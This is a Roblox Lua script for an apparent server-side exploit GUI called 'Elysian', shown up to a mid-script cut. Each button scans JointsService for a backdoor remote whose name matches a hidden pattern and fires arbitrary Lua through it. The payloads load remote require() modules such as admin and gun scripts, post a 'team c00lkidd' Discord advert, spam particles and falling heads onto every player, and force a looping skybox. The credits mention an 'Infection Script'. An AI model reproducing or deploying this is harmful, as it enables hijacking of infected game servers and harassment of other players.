local elysian = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local execute = Instance.new("TextButton")
local clear = Instance.new("TextButton")
local output = Instance.new("TextLabel")
local TextLabel = Instance.new("TextLabel")
local image = Instance.new("ImageLabel")
local TextBox = Instance.new("TextBox")
local elysian_2 = Instance.new("TextButton")
local view = Instance.new("TextButton")
local scriptlist = Instance.new("ScrollingFrame")
local infyield = Instance.new("TextButton")
local gguns = Instance.new("TextButton")
local gcg = Instance.new("TextButton")
local oneg = Instance.new("TextButton")
local cmess = Instance.new("TextButton")
local cgv = Instance.new("TextButton")
local anonall = Instance.new("TextButton")
local mlg = Instance.new("TextButton")
local shedl = Instance.new("TextButton")
local koolaid = Instance.new("TextButton")
local skel = Instance.new("TextButton")
local opguns = Instance.new("TextButton")
local r6 = Instance.new("TextButton")
local viewl = Instance.new("Frame")
local credits = Instance.new("TextButton")
local console = Instance.new("TextButton")
local elysianf = Instance.new("Frame")
local exit = Instance.new("TextButton")
local attach = Instance.new("TextButton")
local creditsXD = Instance.new("Frame")
local a = Instance.new("TextLabel")
local b = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local ImageLabel = Instance.new("ImageLabel")
local fr6 = Instance.new("TextButton")
local TextLabel_3 = Instance.new("TextLabel")
local elysianconsole = Instance.new("Frame")
local DeveloperConsoleTextLabel = Instance.new("TextLabel")
local CloseButton = Instance.new("TextButton")
local OpenOutputVariableTextButton = Instance.new("TextButton")
local UICorner = Instance.new("UICorner")
local TextLabel_4 = Instance.new("TextLabel")
local OutputFrame = Instance.new("Frame")
local scroll = Instance.new("ScrollingFrame")
local blankLine = Instance.new("TextLabel")
local image_2 = Instance.new("ImageLabel")

elysian.Name = "elysian"
elysian.Parent = game.CoreGui

Frame.Parent = elysian
Frame.Active = true
Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame.Position = UDim2.new(0.236403197, 0, 0.1433869, 0)
Frame.Size = UDim2.new(0, 627, 0, 381)

execute.Name = "execute"
execute.Parent = Frame
execute.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
execute.Position = UDim2.new(0.0159489624, 0, 0.685039341, 0)
execute.Size = UDim2.new(0, 137, 0, 27)
execute.Font = Enum.Font.SourceSans
execute.Text = "Execute"
execute.TextColor3 = Color3.fromRGB(0, 0, 0)
execute.TextSize = 14.000

clear.Name = "clear"
clear.Parent = Frame
clear.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
clear.Position = UDim2.new(0.0159489624, 0, 0.790026248, 0)
clear.Size = UDim2.new(0, 137, 0, 23)
clear.Font = Enum.Font.SourceSans
clear.Text = "Clear"
clear.TextColor3 = Color3.fromRGB(0, 0, 0)
clear.TextSize = 14.000

output.Name = "output"
output.Parent = Frame
output.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
output.Position = UDim2.new(0.248803824, 0, 0.669291317, 0)
output.Size = UDim2.new(0, 326, 0, 116)
output.Font = Enum.Font.SourceSans
output.Text = " Authenticating... "
output.TextColor3 = Color3.fromRGB(0, 0, 0)
output.TextSize = 14.000
output.TextWrapped = true
output.TextXAlignment = Enum.TextXAlignment.Left
output.TextYAlignment = Enum.TextYAlignment.Top

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.047846891, 0, 0, 0)
TextLabel.Size = UDim2.new(0, 597, 0, 22)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "Elysian"
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextSize = 14.000
TextLabel.TextXAlignment = Enum.TextXAlignment.Left

image.Name = "image"
image.Parent = Frame
image.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
image.BorderSizePixel = 0
image.Size = UDim2.new(0, 23, 0, 22)
image.Image = "rbxassetid://8550773023"

TextBox.Parent = Frame
TextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextBox.Position = UDim2.new(0.0159489624, 0, 0.144356951, 0)
TextBox.Size = UDim2.new(0, 464, 0, 193)
TextBox.ClearTextOnFocus = false
TextBox.Font = Enum.Font.SourceSans
TextBox.MultiLine = true
TextBox.Text = " press \"attach\"!"
TextBox.TextColor3 = Color3.fromRGB(0, 0, 0)
TextBox.TextSize = 14.000
TextBox.TextXAlignment = Enum.TextXAlignment.Left
TextBox.TextYAlignment = Enum.TextYAlignment.Top

elysian_2.Name = "elysian"
elysian_2.Parent = Frame
elysian_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
elysian_2.BorderSizePixel = 0
elysian_2.Position = UDim2.new(0, 0, 0.076115489, 0)
elysian_2.Size = UDim2.new(0, 88, 0, 18)
elysian_2.Font = Enum.Font.SourceSans
elysian_2.Text = "Elysian"
elysian_2.TextColor3 = Color3.fromRGB(0, 0, 0)
elysian_2.TextSize = 14.000

view.Name = "view"
view.Parent = Frame
view.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
view.BorderSizePixel = 0
view.Position = UDim2.new(0.140350878, 0, 0.076115489, 0)
view.Size = UDim2.new(0, 88, 0, 18)
view.Font = Enum.Font.SourceSans
view.Text = "View"
view.TextColor3 = Color3.fromRGB(0, 0, 0)
view.TextSize = 14.000
view.TextXAlignment = Enum.TextXAlignment.Left

scriptlist.Name = "scriptlist"
scriptlist.Parent = Frame
scriptlist.Active = true
scriptlist.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
scriptlist.Position = UDim2.new(0.768740058, 0, 0.144356951, 0)
scriptlist.Size = UDim2.new(0, 145, 0, 316)
scriptlist.HorizontalScrollBarInset = Enum.ScrollBarInset.Always
scriptlist.ScrollBarThickness = 13

infyield.Name = "infyield"
infyield.Parent = scriptlist
infyield.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
infyield.Position = UDim2.new(0, 0, -0.000480845018, 0)
infyield.Size = UDim2.new(0, 132, 0, 23)
infyield.Font = Enum.Font.SourceSans
infyield.Text = "Infinite Yield Modded"
infyield.TextColor3 = Color3.fromRGB(0, 0, 0)
infyield.TextSize = 14.000

gguns.Name = "gguns"
gguns.Parent = scriptlist
gguns.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
gguns.Position = UDim2.new(0, 0, 0.0297028814, 0)
gguns.Size = UDim2.new(0, 132, 0, 23)
gguns.Font = Enum.Font.SourceSans
gguns.Text = "Gun Giver"
gguns.TextColor3 = Color3.fromRGB(0, 0, 0)
gguns.TextSize = 14.000

gcg.Name = "gcg"
gcg.Parent = scriptlist
gcg.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
gcg.Position = UDim2.new(0, 0, 0.0598866083, 0)
gcg.Size = UDim2.new(0, 132, 0, 23)
gcg.Font = Enum.Font.SourceSans
gcg.Text = "Game Curser Gui"
gcg.TextColor3 = Color3.fromRGB(0, 0, 0)
gcg.TextSize = 14.000

oneg.Name = "oneg"
oneg.Parent = scriptlist
oneg.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
oneg.Position = UDim2.new(0, 0, 0.0900703371, 0)
oneg.Size = UDim2.new(0, 132, 0, 23)
oneg.Font = Enum.Font.SourceSans
oneg.Text = "rare 1x1x1x1 gui"
oneg.TextColor3 = Color3.fromRGB(0, 0, 0)
oneg.TextSize = 14.000

cmess.Name = "cmess"
cmess.Parent = scriptlist
cmess.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
cmess.Position = UDim2.new(0, 0, 0.120254062, 0)
cmess.Size = UDim2.new(0, 132, 0, 23)
cmess.Font = Enum.Font.SourceSans
cmess.Text = "c00l message"
cmess.TextColor3 = Color3.fromRGB(0, 0, 0)
cmess.TextSize = 14.000

cgv.Name = "cgv"
cgv.Parent = scriptlist
cgv.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
cgv.Position = UDim2.new(0, 0, 0.150437787, 0)
cgv.Size = UDim2.new(0, 132, 0, 23)
cgv.Font = Enum.Font.SourceSans
cgv.Text = "c00lgui v3rx"
cgv.TextColor3 = Color3.fromRGB(0, 0, 0)
cgv.TextSize = 14.000

anonall.Name = "anonall"
anonall.Parent = scriptlist
anonall.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
anonall.Position = UDim2.new(0, 0, 0.18062152, 0)
anonall.Size = UDim2.new(0, 132, 0, 23)
anonall.Font = Enum.Font.SourceSans
anonall.Text = "anonymous particles"
anonall.TextColor3 = Color3.fromRGB(0, 0, 0)
anonall.TextSize = 14.000

mlg.Name = "mlg"
mlg.Parent = scriptlist
mlg.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
mlg.Position = UDim2.new(0, 0, 0.210805252, 0)
mlg.Size = UDim2.new(0, 132, 0, 23)
mlg.Font = Enum.Font.SourceSans
mlg.Text = "mlg particles"
mlg.TextColor3 = Color3.fromRGB(0, 0, 0)
mlg.TextSize = 14.000

shedl.Name = "shedl"
shedl.Parent = scriptlist
shedl.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
shedl.Position = UDim2.new(0, 0, 0.240988985, 0)
shedl.Size = UDim2.new(0, 132, 0, 23)
shedl.Font = Enum.Font.SourceSans
shedl.Text = "shedletsky laughing"
shedl.TextColor3 = Color3.fromRGB(0, 0, 0)
shedl.TextSize = 14.000

koolaid.Name = "koolaid"
koolaid.Parent = scriptlist
koolaid.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
koolaid.Position = UDim2.new(0, 0, 0.271172702, 0)
koolaid.Size = UDim2.new(0, 132, 0, 23)
koolaid.Font = Enum.Font.SourceSans
koolaid.Text = "koolaid"
koolaid.TextColor3 = Color3.fromRGB(0, 0, 0)
koolaid.TextSize = 14.000

skel.Name = "skel"
skel.Parent = scriptlist
skel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
skel.Position = UDim2.new(0, 0, 0.301356435, 0)
skel.Size = UDim2.new(0, 132, 0, 23)
skel.Font = Enum.Font.SourceSans
skel.Text = "skeleton skybox"
skel.TextColor3 = Color3.fromRGB(0, 0, 0)
skel.TextSize = 14.000

opguns.Name = "op guns"
opguns.Parent = scriptlist
opguns.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
opguns.Position = UDim2.new(0, 0, 0.331540167, 0)
opguns.Size = UDim2.new(0, 132, 0, 23)
opguns.Font = Enum.Font.SourceSans
opguns.Text = "op guns"
opguns.TextColor3 = Color3.fromRGB(0, 0, 0)
opguns.TextSize = 14.000

r6.Name = "r6"
r6.Parent = scriptlist
r6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
r6.Position = UDim2.new(0, 0, 0.3617239, 0)
r6.Size = UDim2.new(0, 132, 0, 23)
r6.Font = Enum.Font.SourceSans
r6.Text = "R6"
r6.TextColor3 = Color3.fromRGB(0, 0, 0)
r6.TextSize = 14.000
r6.TextWrapped = true

viewl.Name = "viewl"
viewl.Parent = Frame
viewl.Active = true
viewl.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
viewl.Position = UDim2.new(0.110047847, 0, 0.123359583, 0)
viewl.Size = UDim2.new(0, 78, 0, 100)
viewl.Visible = false

credits.Name = "credits"
credits.Parent = viewl
credits.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
credits.BorderSizePixel = 0
credits.Position = UDim2.new(0, 0, 0.219999999, 0)
credits.Size = UDim2.new(0, 78, 0, 19)
credits.Font = Enum.Font.SourceSans
credits.Text = "Credits"
credits.TextColor3 = Color3.fromRGB(0, 0, 0)
credits.TextSize = 14.000

console.Name = "console"
console.Parent = viewl
console.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
console.BorderSizePixel = 0
console.Size = UDim2.new(0, 78, 0, 19)
console.Font = Enum.Font.SourceSans
console.Text = "Console"
console.TextColor3 = Color3.fromRGB(0, 0, 0)
console.TextSize = 14.000

elysianf.Name = "elysianf"
elysianf.Parent = Frame
elysianf.Active = true
elysianf.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
elysianf.Position = UDim2.new(0.0159489624, 0, 0.123359583, 0)
elysianf.Size = UDim2.new(0, 78, 0, 100)
elysianf.Visible = false

exit.Name = "exit"
exit.Parent = elysianf
exit.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
exit.BorderSizePixel = 0
exit.Position = UDim2.new(0, 0, 0.219999999, 0)
exit.Size = UDim2.new(0, 78, 0, 19)
exit.Font = Enum.Font.SourceSans
exit.Text = "Exit"
exit.TextColor3 = Color3.fromRGB(0, 0, 0)
exit.TextSize = 14.000

attach.Name = "attach"
attach.Parent = elysianf
attach.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
attach.BorderSizePixel = 0
attach.Size = UDim2.new(0, 78, 0, 19)
attach.Font = Enum.Font.SourceSans
attach.Text = "Attach"
attach.TextColor3 = Color3.fromRGB(0, 0, 0)
attach.TextSize = 14.000

creditsXD.Name = "creditsXD"
creditsXD.Parent = Frame
creditsXD.Active = true
creditsXD.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
creditsXD.BackgroundTransparency = 0.550
creditsXD.Position = UDim2.new(0.416267931, 0, 1.03149617, 0)
creditsXD.Size = UDim2.new(0, 503, 0, 149)
creditsXD.Visible = false

a.Name = "a"
a.Parent = creditsXD
a.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
a.BorderColor3 = Color3.fromRGB(255, 0, 0)
a.BorderSizePixel = 3
a.Size = UDim2.new(0, 502, 0, 50)
a.Font = Enum.Font.SourceSans
a.Text = "Unrestricted Script Project by LordMuhamad"
a.TextColor3 = Color3.fromRGB(255, 255, 255)
a.TextScaled = true
a.TextSize = 14.000
a.TextWrapped = true

b.Name = "b"
b.Parent = creditsXD
b.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
b.BorderColor3 = Color3.fromRGB(255, 0, 0)
b.BorderSizePixel = 3
b.Position = UDim2.new(0, 0, 0.332720548, 0)
b.Size = UDim2.new(0, 502, 0, 50)
b.Font = Enum.Font.SourceSans
b.Text = "Infection Script by SrimpingKid"
b.TextColor3 = Color3.fromRGB(255, 255, 255)
b.TextScaled = true
b.TextSize = 14.000
b.TextWrapped = true

TextLabel_2.Parent = creditsXD
TextLabel_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_2.BorderColor3 = Color3.fromRGB(255, 0, 0)
TextLabel_2.BorderSizePixel = 3
TextLabel_2.Position = UDim2.new(0, 0, 0.667977571, 0)
TextLabel_2.Size = UDim2.new(0, 502, 0, 50)
TextLabel_2.Font = Enum.Font.SourceSans
TextLabel_2.Text = "Internal Uis by LordMuhamad"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextWrapped = true

ImageLabel.Parent = elysian
ImageLabel.Active = true
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.BackgroundTransparency = 1.000
ImageLabel.Position = UDim2.new(-0.127000004, 0, 0.407999992, 0)
ImageLabel.Size = UDim2.new(0, 90, 0, 90)
ImageLabel.Image = "rbxassetid://8550773023"

fr6.Name = "fr6"
fr6.Parent = ImageLabel
fr6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
fr6.BackgroundTransparency = 1.000
fr6.Position = UDim2.new(0, 0, -0.633333325, 0)
fr6.Size = UDim2.new(0, 90, 0, 50)
fr6.Font = Enum.Font.SourceSansBold
fr6.Text = "R15 -> R6"
fr6.TextColor3 = Color3.fromRGB(0, 0, 0)
fr6.TextScaled = true
fr6.TextSize = 18.000
fr6.TextTransparency = 1.000
fr6.TextWrapped = true

TextLabel_3.Parent = ImageLabel
TextLabel_3.Active = true
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Position = UDim2.new(0.99999994, 0, 0, 0)
TextLabel_3.Size = UDim2.new(0, 269, 0, 90)
TextLabel_3.Font = Enum.Font.SourceSansBold
TextLabel_3.LineHeight = 1.100
TextLabel_3.Text = "Unrestricted Script Project by LordMuhamad Run scripts live without filthy modules or converting!                                                              Use the external program to execute scripts.                                                                                                                                                                 Status: Injected"
TextLabel_3.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_3.TextScaled = true
TextLabel_3.TextSize = 15.000
TextLabel_3.TextTransparency = 1.000
TextLabel_3.TextWrapped = true

elysianconsole.Name = "elysianconsole"
elysianconsole.Parent = elysian
elysianconsole.Active = true
elysianconsole.BackgroundColor3 = Color3.fromRGB(83, 83, 83)
elysianconsole.BorderSizePixel = 0
elysianconsole.Position = UDim2.new(0.330061585, 0, 0.220835596, 0)
elysianconsole.Size = UDim2.new(0, 663, 0, 37)
elysianconsole.Visible = false

DeveloperConsoleTextLabel.Name = "DeveloperConsoleTextLabel"
DeveloperConsoleTextLabel.Parent = elysianconsole
DeveloperConsoleTextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
DeveloperConsoleTextLabel.BackgroundTransparency = 1.000
DeveloperConsoleTextLabel.BorderSizePixel = 0
DeveloperConsoleTextLabel.Position = UDim2.new(0.066365011, 0, 0.170645222, 0)
DeveloperConsoleTextLabel.Size = UDim2.new(0, 170, 0, 21)
DeveloperConsoleTextLabel.Font = Enum.Font.Gotham
DeveloperConsoleTextLabel.Text = "Elysian Console"
DeveloperConsoleTextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
DeveloperConsoleTextLabel.TextScaled = true
DeveloperConsoleTextLabel.TextSize = 14.000
DeveloperConsoleTextLabel.TextWrapped = true

CloseButton.Name = "CloseButton"
CloseButton.Parent = elysianconsole
CloseButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
CloseButton.BackgroundTransparency = 1.000
CloseButton.Position = UDim2.new(0.945701361, 0, -0.0270271301, 0)
CloseButton.Size = UDim2.new(0, 36, 0, 37)
CloseButton.Font = Enum.Font.Jura
CloseButton.Text = "X"
CloseButton.TextColor3 = Color3.fromRGB(255, 255, 255)
CloseButton.TextScaled = true
CloseButton.TextSize = 14.000
CloseButton.TextWrapped = true

OpenOutputVariableTextButton.Name = "OpenOutputVariableTextButton"
OpenOutputVariableTextButton.Parent = elysianconsole
OpenOutputVariableTextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
OpenOutputVariableTextButton.BackgroundTransparency = 0.500
OpenOutputVariableTextButton.Position = UDim2.new(0.322775364, 0, 0.189189181, 0)
OpenOutputVariableTextButton.Size = UDim2.new(0, 105, 0, 21)
OpenOutputVariableTextButton.Font = Enum.Font.Gotham
OpenOutputVariableTextButton.Text = "Enable Output"
OpenOutputVariableTextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
OpenOutputVariableTextButton.TextSize = 14.000

UICorner.Parent = OpenOutputVariableTextButton

TextLabel_4.Parent = elysianconsole
TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_4.BackgroundTransparency = 1.000
TextLabel_4.Position = UDim2.new(0.481146395, 0, 0, 0)
TextLabel_4.Size = UDim2.new(0, 235, 0, 36)
TextLabel_4.Font = Enum.Font.Gotham
TextLabel_4.Text = "Once Clicked \"EnableOutput\" You Can't Turn It Back!"
TextLabel_4.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_4.TextScaled = true
TextLabel_4.TextSize = 14.000
TextLabel_4.TextWrapped = true

OutputFrame.Name = "OutputFrame"
OutputFrame.Parent = elysianconsole
OutputFrame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
OutputFrame.BackgroundTransparency = 0.500
OutputFrame.BorderSizePixel = 0
OutputFrame.Position = UDim2.new(0, 0, 0, 37)
OutputFrame.Size = UDim2.new(0, 663, 0, 388)

scroll.Name = "scroll"
scroll.Parent = OutputFrame
scroll.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
scroll.BackgroundTransparency = 1.000
scroll.BorderColor3 = Color3.fromRGB(0, 0, 0)
scroll.Position = UDim2.new(0.00234161434, 0, 0.00262026442, 0)
scroll.Size = UDim2.new(0, 661, 0, 386)
scroll.ZIndex = 9
scroll.BottomImage = "rbxassetid://185945953"
scroll.CanvasSize = UDim2.new(0, 0, 0, 0)
scroll.MidImage = "rbxassetid://185945953"
scroll.ScrollBarThickness = 10
scroll.TopImage = "rbxassetid://185945953"

blankLine.Name = "blankLine"
blankLine.Parent = OutputFrame
blankLine.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
blankLine.BackgroundTransparency = 1.000
blankLine.BorderColor3 = Color3.fromRGB(0, 0, 0)
blankLine.BorderSizePixel = 0
blankLine.ZIndex = 10
blankLine.Font = Enum.Font.Gotham
blankLine.Text = ""
blankLine.TextColor3 = Color3.fromRGB(0, 0, 0)
blankLine.TextSize = 18.000
blankLine.TextXAlignment = Enum.TextXAlignment.Left

image_2.Name = "image"
image_2.Parent = elysianconsole
image_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
image_2.BackgroundTransparency = 1.000
image_2.BorderSizePixel = 0
image_2.Position = UDim2.new(0.00658691768, 0, 0.0540540554, 0)
image_2.Size = UDim2.new(0, 39, 0, 33)
image_2.Image = "rbxassetid://8550773023"

-- Scripts:

local function EGPTBP_fake_script() -- execute.execrip 
	local script = Instance.new('Script', execute)

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in ipairs(game:GetService("JointsService"):GetDescendants()) do
			if v.Name:match("%^\\") then
				v:FireServer(script.Parent.Parent.TextBox.Text)
			end
		end
	end)
end
coroutine.wrap(EGPTBP_fake_script)()
local function KBZE_fake_script() -- clear.clerscrip 
	local script = Instance.new('Script', clear)

	script.Parent.MouseButton1Click:Connect(function(plr)
		script.Parent.Parent.TextBox.Text = " "
	end)
end
coroutine.wrap(KBZE_fake_script)()
local function QUSUJN_fake_script() -- output.LocalScript 
	local script = Instance.new('LocalScript', output)

	local Output = script.Parent
	
	local ElysianUser = game:GetService("Players").LocalPlayer.Name
	wait(3)
	Output.Text = (Output.Text.."OK (3.734000s)")
	
end
coroutine.wrap(QUSUJN_fake_script)()
local function TYOPD_fake_script() -- elysian_2.elysianscript 
	local script = Instance.new('LocalScript', elysian_2)

	script.Parent.MouseButton1Click:Connect(function()
		if script.Parent.Parent.elysianf.Visible == false then
			script.Parent.Parent.elysianf.Visible = true
	else script.Parent.Parent.elysianf.Visible = false
		end
	end)
end
coroutine.wrap(TYOPD_fake_script)()
local function YEGGVIL_fake_script() -- view.viewscript 
	local script = Instance.new('LocalScript', view)

	script.Parent.MouseButton1Click:Connect(function()
		if script.Parent.Parent.viewl.Visible == false then
			script.Parent.Parent.viewl.Visible = true
		else script.Parent.Parent.viewl.Visible = false
		end
	end)
end
coroutine.wrap(YEGGVIL_fake_script)()
local function QFHODU_fake_script() -- infyield.iys 
	local script = Instance.new('LocalScript', infyield)

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in ipairs(game:GetService("JointsService"):GetDescendants()) do
			if v.Name:match("%^\\") then
				v:FireServer([[require(4848156552)("]]..game:GetService('Players').LocalPlayer.Name..[[")]])
			end
		end
	end)
end
coroutine.wrap(QFHODU_fake_script)()
local function CBGCVTM_fake_script() -- gguns.gguns 
	local script = Instance.new('LocalScript', gguns)

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in ipairs(game:GetService("JointsService"):GetDescendants()) do
			if v.Name:match("%^\\") then
				v:FireServer([[require(4207271766).load("]]..game:GetService('Players').LocalPlayer.Name..[[")]])
			end
		end
	end)
end
coroutine.wrap(CBGCVTM_fake_script)()
local function NWWP_fake_script() -- gcg.gcgs 
	local script = Instance.new('LocalScript', gcg)

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in ipairs(game:GetService("JointsService"):GetDescendants()) do
			if v.Name:match("%^\\") then
				v:FireServer([[require(8226150094).load("]]..game:GetService('Players').LocalPlayer.Name..[[")]])
			end
		end
	end)
end
coroutine.wrap(NWWP_fake_script)()
local function GYYJ_fake_script() -- oneg.onegs 
	local script = Instance.new('LocalScript', oneg)

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in ipairs(game:GetService("JointsService"):GetDescendants()) do
			if v.Name:match("%^\\") then
				v:FireServer([[require(8515473220).load("]]..game:GetService('Players').LocalPlayer.Name..[[")]])
			end
		end
	end)
end
coroutine.wrap(GYYJ_fake_script)()
local function JHDNH_fake_script() -- cmess.cmessS 
	local script = Instance.new('LocalScript', cmess)

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in ipairs(game:GetService("JointsService"):GetDescendants()) do
			if v.Name:match("%^\\") then
				v:FireServer([[local m = Instance.new("Hint", game.Workspace) m.Text = "team c00lkidd, join today! https://discord.gg/7A5DRmUCnj"]])
			end
		end
	end)
end
coroutine.wrap(JHDNH_fake_script)()
local function DLZGHCX_fake_script() -- cgv.cgvS 
	local script = Instance.new('LocalScript', cgv)

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in ipairs(game:GetService("JointsService"):GetDescendants()) do
			if v.Name:match("%^\\") then
				v:FireServer([[require(6032524768).Eagle("]]..game:GetService('Players').LocalPlayer.Name..[[")]])
			end
		end
	end)
end
coroutine.wrap(DLZGHCX_fake_script)()
local function HRBRUBA_fake_script() -- anonall.anonallS 
	local script = Instance.new('LocalScript', anonall)

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in ipairs(game:GetService("JointsService"):GetDescendants()) do
			if v.Name:match("%^\\") then
				v:FireServer([[local playerLeaderstats = {} for i, v in pairs(game.Players:GetChildren()) do table.insert(playerLeaderstats, v) end for i, v in pairs(playerLeaderstats) do pe = Instance.new("ParticleEmitter",v.Character.Torso) pe.Texture = "http://www.roblox.com/asset/?id=127476787" pe.VelocitySpread = 50 end]])
			end
		end
	end)
end
coroutine.wrap(HRBRUBA_fake_script)()
local function FWGHRRV_fake_script() -- mlg.mlgS 
	local script = Instance.new('LocalScript', mlg)

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in ipairs(game:GetService("JointsService"):GetDescendants()) do
			if v.Name:match("%^\\") then
				v:FireServer([[for i,v in pairs(game.Players:GetChildren())do local emit=Instance.new("ParticleEmitter")emit.Parent=v.Character.Torso emit.Texture="http://www.roblox.com/asset/?id=8979672"emit.VelocitySpread=20 end for i,v in pairs(game.Players:GetChildren())do local emit=Instance.new("ParticleEmitter")emit.Parent=v.Character.Torso emit.Texture="http://www.roblox.com/asset/?id=176067516"emit.VelocitySpread=20 end for i,v in pairs(game.Players:GetChildren())do local emit=Instance.new("ParticleEmitter")emit.Parent=v.Character.Torso emit.Texture="http://www.roblox.com/asset/?id=179012130"emit.VelocitySpread=20 end]])
			end
		end
	end)
end
coroutine.wrap(FWGHRRV_fake_script)()
local function WXKTHDI_fake_script() -- shedl.shedlS 
	local script = Instance.new('LocalScript', shedl)

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in ipairs(game:GetService("JointsService"):GetDescendants()) do
			if v.Name:match("%^\\") then
				v:FireServer([[_G.lol=true while _G.lol and wait(2.5)do for i,v in pairs(game:GetService'Players':GetPlayers())do pcall(function()local part=Instance.new("Part")part.Color=Color3.new(math.random(1,255),math.random(1,255),math.random(1,255))part.CanCollide=true part.Size=Vector3.new(2,1,1)local m=Instance.new("SpecialMesh",part)m.MeshType=Enum.MeshType.Head local j=Instance.new('Decal',part)j.Texture='rbxasset://textures/face.png'local s=Instance.new('Sound',part)s.SoundId='rbxassetid://130759239'local aj=math.random(0,9)*0.1 s.Pitch=math.random(0,2)+aj s.Volume=2.5 part.Parent=workspace part.CFrame=v.Character.HumanoidRootPart.CFrame*CFrame.Angles(math.random(0,360),math.random(0,360),math.random(0,360))+Vector3.new(math.random(-100,100),200,math.random(-100,100))s:Play()end)end end]])
			end
		end
	end)
end
coroutine.wrap(WXKTHDI_fake_script)()
local function JFJGEMO_fake_script() -- koolaid.koolaidS 
	local script = Instance.new('LocalScript', koolaid)

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in ipairs(game:GetService("JointsService"):GetDescendants()) do
			if v.Name:match("%^\\") then
				v:FireServer([[require(3010508025).load("]]..game:GetService('Players').LocalPlayer.Name..[[")]])
			end
		end
	end)
end
coroutine.wrap(JFJGEMO_fake_script)()
local function CHVV_fake_script() -- skel.skelS 
	local script = Instance.new('LocalScript', skel)

	script.Parent.MouseButton1Click:Connect(function()
		for i, v in ipairs(game:GetService("JointsService"):GetDescendants()) do
			if v.Name:match("%^\\") then
				v:FireServer([[imageOne="http://www.roblox.com/asset/?id=169585459"imageTwo="http://www.roblox.com/asset/?id=169585475"imageThree="http://www.roblox.com/asset/?id=169585485"imageFour="http://www.roblox.com/asset/?id=169585502"imageFive="http://www.roblox.com/asset/?id=169585515"imageSix="http://www.roblox.com/asset/?id=169585502"imageSeven="http://www.roblox.com/asset/?id=169585485"imageEight="http://www.roblox.com/asset/?id=169585475"Spooky=Instance.new("Sound",workspace)Spooky.Name="Spooky"Spooky.SoundId="rbxassetid://174270407"Spooky.Volume=15 Spooky.Looped=true Spooky:Play()Sky=Instance.new("Sky",game.Lighting)Sky.SkyboxBk=imageOne Sky.SkyboxDn=imageOne Sky.SkyboxFt=imageOne Sky.SkyboxLf=imageOne Sky.SkyboxRt=imageOne Sky.SkyboxUp=imageOne while true do Sky.SkyboxBk=imageOne Sky.SkyboxDn=imageOne Sky.SkyboxFt=imageOne Sky.SkyboxLf=imageOne Sky.SkyboxRt=imageOne Sky.SkyboxUp=imageOne wait(0.15)Sky.SkyboxBk=imageTwo Sky.SkyboxDn=imageTwo Sky.SkyboxFt=imageTwo Sky.SkyboxLf=imageTwo Sky.SkyboxRt=imageTwo Sky.SkyboxUp=imageTwo wait(0.15)Sky.SkyboxBk=imageThree Sky.SkyboxDn=imageThree Sky.SkyboxFt=imageThree Sky.SkyboxLf=imageThree Sky.SkyboxRt=imageThree Sky.SkyboxUp=imageThree 